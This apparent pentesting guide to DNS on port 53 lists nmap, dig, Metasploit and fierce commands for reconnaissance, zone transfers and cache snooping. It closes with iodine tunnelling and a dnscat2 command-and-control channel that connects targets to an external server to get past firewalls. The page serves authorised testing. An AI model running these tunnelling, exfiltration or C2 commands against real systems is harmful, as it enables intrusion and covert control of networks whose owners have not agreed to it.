Port 53 – DNS
Pentesting DNS
Discovery and Enumeration
The first step in testing DNS is to discover where it exists and how it behaves. You can use several network scanning techniques detailed here to identify DNS services to focus on for penetration testing.
Scanning for DNS Services
The Nmap tool can be used to scan for DNS targets
nmap -p 53 --open 10.1.1.1 #Check if DNS is running on a target IP nmap -p 53 --open -iL targets.txt #Scan multiple DNS servers from a file of targets nmap -p 53 --open 10.1.1.0/24 #Scan a subnet for open DNS servers nmap -p 53 -sV 10.1.1.1 #Identify the DNS software and version
You can use dig to identify authoritative name servers.
dig +short NS <target/domain> #List the nameservers for a domain
Banner Grabbing and Fingerprinting
Identifying the DNS software version and configuration can reveal potential vulnerabilities to exploit or pivot in an internal environment.
Using Dig for Banner Grabbing
If the server responds with a version number, you can use this information for vulnerability research relating to the specific version.
dig @10.1.1.1 version.bind CH TXT #Attempt to retrieve DNS server version
Using Nmap for Fingerprinting
nmap -p 53 --script dns-nsid 10.1.1.1 #Retrieve Name Server Identifier (NSID) nmap -p 53 --script dns-service-discovery 10.1.1.1 #Discover DNS services
Using Metasploit
use auxiliary/scanner/dns/dns_version #DNS version enumeration set RHOSTS 10.1.1.1 run
Once the DNS server type is known, search for public vulnerabilities related to it. All DNS-related exploits found in the Exploit Database can be listed using the following: https://www.exploit-db.com/search?q=DNS
Zone Transfer Attacks
A Zone Transfer allows a secondary DNS server to copy records from the primary DNS server. If misconfigured, attackers can request zone transfers and extract the entire domain structure.
Manual Zone Transfer Attack
If the below is successful, it will leak all DNS records, revealing:
- Subdomains
- Internal IPs
- Mail servers
- Load balancers
dig axfr @10.1.1.1 #Attempt a zone transfer without the domain name dig axfr @<target-ip> <target-domain> #Attempt a full zone transfer
Subdomain and Record Enumeration
Finding subdomains and DNS records can uncover hidden assets within an organization.
Enumerate All DNS Records
dig ANY <target-domain> @<target-ip> #Query all available records
Brute-Force Subdomains with Nmap
nmap --script dns-brute -p 53 10.1.1.1 #Attempt subdomain brute-force
Enumerate Subdomains Using a Wordlist
You can use dig with a wordlist containing domain names and script it to test for valid DNS names.
for sub in $(cat subdomains.txt); do dig +short $sub.<target-domain>; done
Using Fierce for Automated DNS Enumeration
Fierce is a DNS reconnaissance tool for locating non-contiguous IP space. It can also be used for DNS enumeration and finding hidden services running under subdomains. It can be found here.
fierce --domain <target-domain> --dns-servers <target-ip>
DNS Cache Snooping
DNS Cache Snooping allows an attacker to determine what domains have been recently queried by a DNS resolver.
Checking If a Domain is Cached
If the response to the command below contains an answer, it means the domain has been queried before.
dig @<target-ip> <target-domain> +norecurse #Check if a domain is cached
Using Nmap for DNS Snooping
nmap --script dns-cache-snoop -p 53 10.1.1.1
DNS Tunneling and Data Exfiltration
DNS can be abused to bypass security measures by exfiltrating data through DNS queries, which is excellent for penetration testers and Red Team exercises.
Using Iodine for DNS Tunneling
Iodine is software that lets you tunnel IPv4 data through a DNS server. This can be useful in situations where internet access is firewalled but DNS queries are allowed. You can find Iodine here.
- Start an Iodine DNS tunnel server on an external system:
iodined -f -c -P secretpassword 10.1.1.1 tunnel.example.com
- Connect to the tunnel from the target system
iodine -P secretpassword tunnel.example.com
Traffic should now be tunnelled through DNS queries, bypassing firewalls.
Using DNScat2 for Command Execution Over DNS
DNScat2 is a tool for creating an encrypted command-and-control (C&C) channel over the DNS protocol, which is an effective tunnel out of almost every network. You can find DNScat2 here.
dnscat2 10.1.1.1 #Establishes a command-and-control (C2) channel over DNS.